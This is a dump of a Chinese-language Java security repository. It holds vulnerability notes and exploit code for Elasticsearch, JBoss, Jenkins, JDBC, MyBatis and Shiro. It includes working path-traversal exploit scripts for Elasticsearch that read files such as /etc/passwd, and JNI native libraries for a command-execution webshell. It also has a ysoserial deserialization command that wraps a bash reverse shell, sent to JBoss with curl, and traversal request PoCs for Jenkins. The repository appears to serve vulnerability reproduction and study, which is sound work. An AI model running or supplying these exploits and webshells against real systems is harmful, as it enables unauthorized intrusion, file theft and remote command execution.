3 | import requests 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | """ 9 | 漏洞原理 10 | 在安装了具有"site"功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。 11 | 没有安装任意插件的elasticsearch不受影响。 12 | 13 | 影响版本 14 | ElasticSearch 1.4.5以下/1.5.2以下 15 | 16 | 查看所有已安装的插件:/_cat/plugins 17 | 需要满足安装elasticsearch-head扩展 18 | """ 19 | 20 | url = "http://ip" 21 | exp = "../../../../../../../../.." 22 | filename = input("输入读的文件>>> ") 23 | r=requests.request("GET",url+"/_plugin/head/"+filename) 24 | print(r.text) 25 | -------------------------------------------------------------------------------- /Elasticsearch/ElasticSearch 目录穿越漏洞(CVE-2015-5531)/exp.py: -------------------------------------------------------------------------------- 1 | #@author Firbasky 2 | #参考https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 3 | import requests 4 | import urllib3 5 | 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | """ 9 | 漏洞原理 10 | elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。 11 | 之后的新版,配置文件elasticsearch.yml中必须存在path.repo, 12 | 该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。 13 | 14 | 影响版本 15 | ElasticSearch 1.6.1以下 16 | """ 17 | url = "http://ip" 18 | 19 | headers = {"Content-type": "application/json","Accept": "*/*"} 20 | 21 | # /_snapshot/test PUT 22 | add_Warehouse = { 23 | "type": "fs", 24 | "settings": { 25 | "location": "/usr/share/elasticsearch/repo/test" 26 | } 27 | } 28 | # PUT /_snapshot/test2 29 | add_snapshot = { 30 | "type": "fs", 31 | "settings": { 32 | "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 33 | } 34 | } 35 | 36 | requests.request("PUT",url=url+"/_snapshot/test",data=add_Warehouse,verify=False,headers=headers) 37 | 38 | requests.request("PUT",url=url+"/_snapshot/test",data=add_snapshot,verify=False,headers=headers) 39 | 40 | r = requests.request("GET",url=url+"/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",verify=False,headers=headers) 41 | 42 | print(r.text) 43 | -------------------------------------------------------------------------------- /Elasticsearch/Elasticsearch写入webshell漏洞(WooYun-2015-110216)/exp.py: -------------------------------------------------------------------------------- 1 | #https://github.com/vulhub/vulhub/tree/master/elasticsearch/WooYun-2015-110216 2 | -------------------------------------------------------------------------------- /Elasticsearch/README.md: -------------------------------------------------------------------------------- 1 | ## Elasticsearch简介 2 | 3 | Elasticsearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的企业级搜索引擎。 4 | 5 | Elasticsearch用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。官方客户端在Java、.NET(C#)、PHP、Python、Apache Groovy、Ruby和许多其他语言中都是可用的。根据DB-Engines的排名显示,Elasticsearch是最受欢迎的企业搜索引擎,其次是`Apache Solr`,也是基于Lucene。由于Elasticsearch的功能强大和使用简单,维基百科、卫报、Stack Overflow、GitHub等都纷纷采用它来做搜索。现在,Elasticsearch已成为全文搜索领域的主流软件之一。 6 | -------------------------------------------------------------------------------- /JNI/Readme.md: -------------------------------------------------------------------------------- 1 | # JNI 2 | 3 | **通过System.load(path) 去加载dll文件不要求后缀名,可以为任意的后缀名,只有能找到路径。** 4 | -------------------------------------------------------------------------------- /JNI/jni.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /JNI/jni/cmd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/jni/cmd.dll -------------------------------------------------------------------------------- /JNI/jni/jni_md.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved. 3 | * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. 4 | * 5 | * 6 | * 7 | * 8 | * 9 | * 10 | * 11 | * 12 | * 13 | * 14 | * 15 | * 16 | * 17 | * 18 | * 19 | * 20 | * 21 | * 22 | * 23 | * 24 | */ 25 | 26 | #ifndef _JAVASOFT_JNI_MD_H_ 27 | #define _JAVASOFT_JNI_MD_H_ 28 | 29 | #define JNIEXPORT __declspec(dllexport) 30 | #define JNIIMPORT __declspec(dllimport) 31 | #define JNICALL __stdcall 32 | 33 | typedef long jint; 34 | typedef __int64 jlong; 35 | typedef signed char jbyte; 36 | 37 | #endif /* !_JAVASOFT_JNI_MD_H_ */ 38 | -------------------------------------------------------------------------------- /JNI/jni/org_javaweb_jni_CommandExecution.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "org_javaweb_jni_CommandExecution.h" 6 | 7 | using namespace std; 8 | 9 | JNIEXPORT jstring 10 | 11 | JNICALL Java_org_javaweb_jni_CommandExecution_exec 12 | (JNIEnv *env, jclass jclass, jstring str) { 13 | if (str != NULL) { 14 | jboolean jsCopy; 15 | const char *cmd = env->GetStringUTFChars(str, &jsCopy);// 将jstring参数转成char指针 16 | FILE *fd = popen(cmd, "r");// 使用popen函数执行系统命令 17 | if (fd != NULL) { 18 | string result; // 返回结果字符串 19 | char buf[128];// 定义字符串数组 20 | while (fgets(buf, sizeof(buf), fd) != NULL) { // 读取popen函数的执行结果 21 | result +=buf; // 拼接读取到的结果到result 22 | } 23 | pclose(fd);// 关闭popen 24 | return env->NewStringUTF(result.c_str());// 返回命令执行结果给Java 25 | } 26 | } 27 | return NULL; 28 | } -------------------------------------------------------------------------------- /JNI/jni/org_javaweb_jni_CommandExecution.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include 3 | /* Header for class org_javaweb_jni_CommandExecution */ 4 | 5 | #ifndef _Included_org_javaweb_jni_CommandExecution 6 | #define _Included_org_javaweb_jni_CommandExecution 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | /* 11 | * Class: org_javaweb_jni_CommandExecution 12 | * Method: exec 13 | * Signature: (Ljava/lang/String;)Ljava/lang/String; 14 | */ 15 | JNIEXPORT jstring JNICALL Java_org_javaweb_jni_CommandExecution_exec 16 | (JNIEnv *, jclass, jstring); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | #endif 22 | -------------------------------------------------------------------------------- /JNI/jni/webshell/jni_md.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved. 3 | * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. 4 | * 5 | * 6 | * 7 | * 8 | * 9 | * 10 | * 11 | * 12 | * 13 | * 14 | * 15 | * 16 | * 17 | * 18 | * 19 | * 20 | * 21 | * 22 | * 23 | * 24 | */ 25 | 26 | #ifndef _JAVASOFT_JNI_MD_H_ 27 | #define _JAVASOFT_JNI_MD_H_ 28 | 29 | #define JNIEXPORT __declspec(dllexport) 30 | #define JNIIMPORT __declspec(dllimport) 31 | #define JNICALL __stdcall 32 | 33 | typedef long jint; 34 | typedef __int64 jlong; 35 | typedef signed char jbyte; 36 | 37 | #endif /* !_JAVASOFT_JNI_MD_H_ */ 38 | -------------------------------------------------------------------------------- /JNI/jni/webshell/libtest.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/jni/webshell/libtest.dll -------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include 3 | /* Header for class org_apache_jsp_test_jsp */ 4 | 5 | #ifndef _Included_org_apache_jsp_test_jsp 6 | #define _Included_org_apache_jsp_test_jsp 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | #endif 14 | -------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp_JniClass.c: -------------------------------------------------------------------------------- 1 | #include "jni.h" 2 | #include "org_apache_jsp_test_jsp_JniClass.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int execmd(const char *cmd, char *result) 10 | { 11 | char buffer[1024*12]; //定义缓冲区 12 | FILE *pipe = _popen(cmd, "r"); //打开管道,并执行命令 13 | if (!pipe) 14 | return 0; //返回0表示运行失败 15 | 16 | while (!feof(pipe)) 17 | { 18 | if (fgets(buffer, 128, pipe)) 19 | { //将管道输出到result中 20 | strcat(result, buffer); 21 | } 22 | } 23 | _pclose(pipe); //关闭管道 24 | return 1; //返回1表示运行成功 25 | } 26 | JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec(JNIEnv *env, jobject class_object, jstring jstr) 27 | { 28 | const char *cstr = (*env)->GetStringUTFChars(env, jstr, NULL); 29 | char result[1024 * 12] = ""; //定义存放结果的字符串数组 30 | if (1 == execmd(cstr, result)) 31 | { 32 | // printf(result); 33 | } 34 | char return_messge[100] = ""; 35 | strcat(return_messge, result); 36 | jstring cmdresult = (*env)->NewStringUTF(env, return_messge); 37 | //system(); 38 | return cmdresult; 39 | } -------------------------------------------------------------------------------- /JNI/jni/webshell/org_apache_jsp_test_jsp_JniClass.h: -------------------------------------------------------------------------------- 1 | /* DO NOT EDIT THIS FILE - it is machine generated */ 2 | #include "jni.h" 3 | /* Header for class org_apache_jsp_test_jsp_JniClass */ 4 | 5 | #ifndef _Included_org_apache_jsp_test_jsp_JniClass 6 | #define _Included_org_apache_jsp_test_jsp_JniClass 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | /* 11 | * Class: org_apache_jsp_test_jsp_JniClass 12 | * Method: exec 13 | * Signature: (Ljava/lang/String;)Ljava/lang/String; 14 | */ 15 | JNIEXPORT jstring JNICALL Java_org_apache_jsp_test_1jsp_00024JniClass_exec 16 | (JNIEnv *, jobject, jstring); 17 | 18 | #ifdef __cplusplus 19 | } 20 | #endif 21 | #endif 22 | -------------------------------------------------------------------------------- /JNI/jni/webshell/命令.txt: -------------------------------------------------------------------------------- 1 | gcc org_apache_jsp_test_jsp_JniClass.c -shared -fPIC -o libtest.dll -------------------------------------------------------------------------------- /JNI/jni/命令.txt: -------------------------------------------------------------------------------- 1 | x86_64-w64-mingw32-g++ -I"%JAVA_HOME%\include" -I"%JAVA_HOME%\include\win32" -shared -o cmd.dll org_javaweb_jni_CommandExecution.cpp 2 | 3 | https://javaweb.org/?p=1866 4 | https://blog.csdn.net/williamgavin/article/details/83867408 5 | https://www3.ntu.edu.sg/home/ehchua/programming/java/JavaNativeInterface.html -------------------------------------------------------------------------------- /JNI/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | jni 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | -------------------------------------------------------------------------------- /JNI/src/main/java/org/apache/jsp/test_jsp.java: -------------------------------------------------------------------------------- 1 | package org.apache.jsp; 2 | 3 | public class test_jsp 4 | { 5 | class JniClass 6 | { 7 | public native String exec( String cmd ); 8 | } 9 | static { 10 | System.setProperty("java.library.path","D:\\library\\"); 11 | System.loadLibrary("libtest"); 12 | // System.loadLibrary("cmd"); 13 | } 14 | 15 | public static void main(String[] args)throws Exception { 16 | test_jsp test_jsp = new test_jsp(); 17 | org.apache.jsp.test_jsp.JniClass jniClass = test_jsp.new JniClass(); 18 | jniClass.exec("calc"); 19 | // System.out.println((File.separatorChar)); 20 | } 21 | } -------------------------------------------------------------------------------- /JNI/src/main/java/org/javaweb/jni/CommandExecution.java: -------------------------------------------------------------------------------- 1 | package org.javaweb.jni; 2 | 3 | import java.io.File; 4 | 5 | public class CommandExecution { 6 | 7 | static { 8 | System.setProperty("java.library.path","D:\\library\\"); 9 | System.loadLibrary("cmd"); 10 | // System.loadLibrary("cmd"); 11 | } 12 | public static native String exec(String cmd); 13 | 14 | public static void main(String[] args) { 15 | exec("calc"); 16 | // System.out.println((File.separatorChar)); 17 | } 18 | } -------------------------------------------------------------------------------- /JNI/src/main/java/org/javaweb/jni/CommandExecutionTest.java: -------------------------------------------------------------------------------- 1 | package org.javaweb.jni; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.Method; 5 | 6 | public class CommandExecutionTest { 7 | public static void main(String[] args) { 8 | cmd("calc"); 9 | } 10 | public static void cmd(String cmd){ 11 | try { 12 | ClassLoader loader = new ClassLoader(CommandExecutionTest.class.getClassLoader()){}; 13 | // 测试时候换成自己编译好的dll路径 14 | File libPath = new File("E:\\java安全\\jni\\jni\\cmd.dll"); 15 | // 加载命令执行类 16 | Class commandClass = loader.loadClass("org.javaweb.jni.CommandExecution"); 17 | // 可以用System.load也加载lib也可以用反射ClassLoader加载,如果loadLibrary0 18 | Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class); 19 | loadLibrary0Method.setAccessible(true); 20 | loadLibrary0Method.invoke(loader, commandClass, libPath); 21 | String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd); 22 | System.out.println(content); 23 | } catch (Exception e) { 24 | e.printStackTrace(); 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /JNI/target/classes/org/apache/jsp/test_jsp$JniClass.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/apache/jsp/test_jsp$JniClass.class -------------------------------------------------------------------------------- /JNI/target/classes/org/apache/jsp/test_jsp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/apache/jsp/test_jsp.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecution.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecution.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecutionTest$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecutionTest$1.class -------------------------------------------------------------------------------- /JNI/target/classes/org/javaweb/jni/CommandExecutionTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/JNI/target/classes/org/javaweb/jni/CommandExecutionTest.class -------------------------------------------------------------------------------- /JNI/wz.txt: -------------------------------------------------------------------------------- 1 | https://javaweb.org/?p=1866 -------------------------------------------------------------------------------- /Jboss/CVE-2017-12149/README.md: -------------------------------------------------------------------------------- 1 | # JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 2 | 3 | ## 漏洞介绍: 4 | 5 | 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 6 | 7 | ## 漏洞分析: 8 | 9 | 该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化: 10 | 11 | ![image-20210401130731439](image-20210401130731439.png) 12 | 13 | ## 漏洞复现: 14 | 15 | java 反弹shell 16 | http://www.jackson-t.ca/runtime-exec-payloads.html 17 | 18 | **生成exp** 19 | 20 | ``` 21 | java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}" > poc.ser 22 | ``` 23 | 24 | **通过curl发送** 25 | 26 | ```curl 27 | curl http://xxxx:8080/invoker/readonly --data-binary @poc.ser 28 | ``` 29 | 30 | -------------------------------------------------------------------------------- /Jboss/CVE-2017-12149/image-20210401130731439.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jboss/CVE-2017-12149/image-20210401130731439.png -------------------------------------------------------------------------------- /Jboss/CVE-2017-7504/README.md: -------------------------------------------------------------------------------- 1 | # JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) 2 | 3 | Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 4 | 5 | ## 利用思路 6 | 7 | 基本上和CVE-2017-12149差不多,只不过利用的路由: `/jbossmq-httpil/HTTPServerILServlet` 8 | -------------------------------------------------------------------------------- /Jboss/JMXInvokerServlet-deserialization/README.md: -------------------------------------------------------------------------------- 1 | # JBoss JMXInvokerServlet 反序列化漏洞 2 | 3 | 这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 4 | 5 | **利用思路和CVE-2017-12149 差不多** 6 | -------------------------------------------------------------------------------- /Jboss/README.md: -------------------------------------------------------------------------------- 1 | ## jboss介绍: 2 | 3 | JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 4 | 5 | 自己测试了网上很多工具发现不是特别好用 而且不集中。。。。 6 | 所以自己想写一个综合利用的工具。。。 7 | -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022135316052.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022135316052.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022135425801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022135425801.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022140911655.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022140911655.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141357429.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141357429.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141453082.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141453082.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022141712911.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022141712911.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022142111106.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022142111106.png -------------------------------------------------------------------------------- /Jdbc/CVE-2021-2471/img/image-20211022142331574.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/CVE-2021-2471/img/image-20211022142331574.png -------------------------------------------------------------------------------- /Jdbc/Readme.md: -------------------------------------------------------------------------------- 1 | # Jdbc 2 | >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 3 | 4 | + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。** 5 | -------------------------------------------------------------------------------- /Jdbc/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/img/1.png -------------------------------------------------------------------------------- /Jdbc/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Jdbc/img/2.png -------------------------------------------------------------------------------- /Jdbc/img/Readme.md: -------------------------------------------------------------------------------- 1 | # 照片 2 | -------------------------------------------------------------------------------- /Jenkins/Readme.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | 3 | ## CVE-2018-1999002 4 | poc 5 | ``` 6 | GET /plugin/credentials/.ini HTTP/1.1 7 | Host: 8 | Accept-Language: ../../../../../../../../windows/win 9 | 10 | GET /plugin/credentials/.txt HTTP/1.1 11 | Host: 12 | Accept-Language: ../../../../../../../../firebasky 13 | ``` 14 | 15 | [Jenkins 任意文件读取漏洞复现与分析-CVE-2018-1999002](https://chybeta.github.io/2018/08/07/Jenkins-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1999002%E3%80%91/) 16 | 17 | linux 下利用难度大 必须找一个存在`_`的目录 18 | 19 | 20 | 21 | 22 | ## 插件问题 xxe/xstream 反序列化 23 | https://github.com/Firebasky/ctf-Challenge/tree/main/2021_xyb_easyJenkins 24 | -------------------------------------------------------------------------------- /MyBatis/Readme.md: -------------------------------------------------------------------------------- 1 | # MyBatis 2 | 3 | + [CVE-2020-26945 mybatis二级缓存反序列化的分析与复现](https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&mid=2247484196&idx=1&sn=735666b28cff6e6552d8f3e16b1be9a5&chksm=fa8b1ebccdfc97aa80b6103587fd418b63c6b0d290cd4229ccc999b3706fe4f325595049a7ce&mpshare=1&scene=23&srcid=1013pFDy9OUsVb24733hEAhA&sharer_sharetime=1602582161965&sharer_shareid=8a8448ee03016e30de742559b7359a01%23rd) 简单的说就是mybatis为了缓解多次查询而开启的缓存,如果可以修改缓存的内容就可以将其反序列化。[CVE-2020-26945漏洞](https://www.anquanke.com/post/id/219457) 4 | -------------------------------------------------------------------------------- /RASP/Readme.md: -------------------------------------------------------------------------------- 1 | # RASP 2 | 3 | Runtime application self-protection 4 | 5 | 它是一种新型应用安全保护技术,它将保护程序像疫苗一样注入到应用程序中,应用程序融为一体,能实时检测和阻断安全攻击,使应用程序具备自我保护能力,当应用程序遭受到实际攻击伤害,就可以自动对其进行防御,而不需要进行人工干预。 6 | 7 | 8 | 9 | RASP技术可以快速的将安全防御功能整合到正在运行的应用程序中,它拦截从应用程序到系统的所有调用,确保它们是安全的,并直接在应用程序内验证数据请求。Web和非Web应用程序都可以通过RASP进行保护。该技术不会影响应用程序的设计,因为RASP的检测和保护功能是在应用程序运行的系统上运行的。 10 | 11 | ### 使用 12 | 13 | https://github.com/baidu/openrasp 14 | 15 | 安装:java -jar RaspInstall.jar -install tomcat目录 16 | 17 | 配置环境变量: 新建 CATALINE_HOME 值为tomcat目录 18 | 19 | 在tomcat目录的bin下执行cataline.bat run 20 | 21 | 测试curl -v 127.0.0.1:8888 |grep OpenRASP 22 | 23 | 服务器的响应 X-Protected-By: OpenRASP 24 | 25 | ### 测试 26 | 27 | https://github.com/baidu-security/openrasp-testcases 28 | 29 | 日志:\rasp\logs\alarm\alarm.log 30 | 31 | ### 实现 32 | 33 | java中是通过Java Agent方式进行实现 34 | 35 | **是通过java的agent配合asm对运行的字节码进行了修改,这样就达到了埋点hook的目的。** 36 | 37 | PHP是通过开发第php扩展库来进行实现。 38 | 39 | .NET是通过IHostingStartup(承载启动)实现 40 | 41 | 42 | 43 | **RASP技术其实主要就是对编程语言的危险底层函数进行hook**,毕竟在怎么编码转换以及调用,最后肯定会去执行最底层的某个方法然后对系统进行调用。由此可以反推出其hook点,然后使用不同的编程语言中不同的技术对其进行实现。 44 | 45 | 46 | 47 | ### 代学习 48 | 49 | https://www.freebuf.com/articles/web/197823.html 50 | 51 | https://paper.seebug.org/1041/ 52 | 53 | https://blog.csdn.net/u011721501/article/details/74990346 54 | 55 | https://paper.seebug.org/330/ 56 | 57 | 58 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Java 2 | 可能有一部分是java的基础语法 3 | 和一些java安全,主要是java安全和java框架漏洞的复现,加一些代码审计 4 | 5 | + 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚 6 | + 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚 7 | + 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚 8 | + 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚 9 | + 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚 10 | + 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚 11 | + 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚 12 | + 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚 **添加了渗透的思路** 13 | + 2021/9/25 [添加java回显](java回显) 💛 💙 💜 ❤️ 💚 14 | + 2021/10/3 [添加Weblogic漏洞](Weblogic) 💛 💙 💜 ❤️ 💚 15 | + 2021/10/15 [添加MyBatis的CVE-2020-26945](MyBatis) 💛 💙 💜 ❤️ 💚 16 | + 2021/10/20 [添加BypassSM](BypassSM) 💛 💙 💜 ❤️ 💚 17 | + 2021/10/25 [添加Xstream](Xstream) 💛 💙 💜 ❤️ 💚 18 | + 2021/11/19 [添加Springboot](Springboot) 💛 💙 💜 ❤️ 💚 19 | + 2021/12/17 [添加Springcloud](Springcolud) 💛 💙 💜 ❤️ 💚 20 | + 2021/12/17 [添加jbdc](Jdbc) 💛 💙 💜 ❤️ 💚 21 | + 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 22 | 23 | 24 | 25 | ## 代学习 26 | 27 | [java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) 28 | 29 | 30 | 31 | ## 小记录 32 | 2021/12/21更新 33 | 34 | 项目100star啦~~~~~~~~ 35 | 36 | 37 | ## Stargazers over time 38 | 39 | [![Stargazers over time](https://starchart.cc/Firebasky/Java.svg)](https://starchart.cc/Firebasky/Java) 40 | 41 | -------------------------------------------------------------------------------- /Shiro/CVE-2020-1957.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/CVE-2020-1957.pdf -------------------------------------------------------------------------------- /Shiro/README.md: -------------------------------------------------------------------------------- 1 | # 关于java框架的Shiro的一些漏洞分析 2 | 3 | + [shiro550目录是Shiro漏洞环境并且自己写了一个扫描shirokey的工具](./shiro550) 4 | + [shiro权限绕过](./Shiro权限绕过/Readme.md) 5 | + [shiro721](./shiro721) [padding oracle和cbc翻转攻击](https://skysec.top/2017/12/13/padding-oracle%E5%92%8Ccbc%E7%BF%BB%E8%BD%AC%E6%94%BB%E5%87%BB/) 6 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.4/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/java/com/shiro/vuln/Shiro/MainRealm.java: -------------------------------------------------------------------------------- 1 | 2 | package com.shiro.vuln.Shiro; 3 | 4 | import org.apache.shiro.authc.*; 5 | import org.apache.shiro.authz.AuthorizationInfo; 6 | import org.apache.shiro.realm.AuthorizingRealm; 7 | import org.apache.shiro.subject.PrincipalCollection; 8 